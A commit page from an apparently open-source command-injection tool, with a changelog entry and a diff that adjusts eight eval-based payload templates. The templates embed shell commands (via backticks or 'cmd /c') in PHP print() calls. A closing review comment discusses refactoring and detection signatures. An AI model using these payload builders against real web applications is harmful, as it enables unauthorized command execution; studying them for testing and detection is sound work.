Minor fix for payload(s) in "eval-based" techninque.
stasinopoulos committed Mar 15, 2016
1 parent 695c89e commit 5a63749
Showing 2 changed files with 9 additions and 8 deletions.
1 change: 1 addition & 0 deletions readme/CHANGELOG.md
@@ -1,4 +1,5 @@
## Version 0.5b [2016]
* Fixed: The payload(s) for dynamic code evaluation ("eval-based"), if there is not any separator.
* Added: Support for verbose mode in the "ICMP exfiltration" injection technique (module).
* Added: Check if the user-defined os name, is different than the one identified by heuristics.
* Added: New option "--os" that forces a user-defined os name.
@@ -32,7 +32,7 @@ def decision(separator, TAG, randv1, randv2):
"set /a (" + str(randv1) + "%2B" + str(randv2) + ")" +
"\"') do @set /p =%i <nul`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B" +
"`echo " + TAG + "`)" +
separator
)
else:
@@ -48,7 +48,7 @@ def decision(separator, TAG, randv1, randv2):
payload = ("print(`echo " + TAG + "`." +
"`echo $((" + str(randv1) + "%2B" + str(randv2) + "))`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B" +
"`echo " + TAG + "`)" +
separator
)
else:
@@ -70,7 +70,7 @@ def decision_alter_shell(separator, TAG, randv1, randv2):
payload = ("print(`echo " + TAG + "`." +
"` cmd /c " + python_payload + "`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B" +
"`echo " + TAG + "`)" +
separator
)
else:
@@ -85,7 +85,7 @@ def decision_alter_shell(separator, TAG, randv1, randv2):
payload = ("print(`echo " + TAG + "`." +
"` " + python_payload + "`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B" +
"`echo " + TAG + "`)" +
separator
)
else:
@@ -111,7 +111,7 @@ def cmd_execution(separator, TAG, cmd):
"`echo " + TAG + "`." +
"` cmd /c " + cmd + "`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B"
"`echo " + TAG + "`)"
)

else:
@@ -127,7 +127,7 @@ def cmd_execution(separator, TAG, cmd):
"`echo " + TAG + "`." +
"`" + cmd + "`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B"
"`echo " + TAG + "`)"
)
else:
payload = ("print(`echo '" + TAG + "'" +
@@ -158,7 +158,7 @@ def cmd_execution_alter_shell(separator, TAG, cmd):
"`echo " + TAG + "`." +
"` cmd /c " + python_payload + "`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B"
"`echo " + TAG + "`)"
)
else:
payload = ("print(`echo '" + TAG + "'" +
@@ -173,7 +173,7 @@ def cmd_execution_alter_shell(separator, TAG, cmd):
"`echo " + TAG + "`." +
"`" + cmd + "`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B"
"`echo " + TAG + "`)"
)
else:
payload = ("print(`echo '" + TAG + "'" +
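Review bot: The same one-token edit (dropping the hard-coded `%3B` after the closing `)`) is made by hand in eight separate string literals across `decision`, `decision_alter_shell`, `cmd_execution` and `cmd_execution_alter_shell`, and the branches already disagree: the four `decision*` literals append `separator` after `)`, while the four `cmd_execution*` literals, as far as the visible lines show, append nothing. Building the shared tail in one small private helper would keep these branches in step, and a comment such as `# no hard-coded %3B here: the caller-supplied separator (possibly empty) is the only terminator` would record why the literal was removed. All four function bodies start and end outside the hunks shown, so whether `separator` is used elsewhere in `cmd_execution*` cannot be confirmed from this page. For detection engineering, signatures written for this tool's eval-based requests should not anchor on a trailing `)%3B`, because after this commit the terminator depends on the separator in use and may be absent.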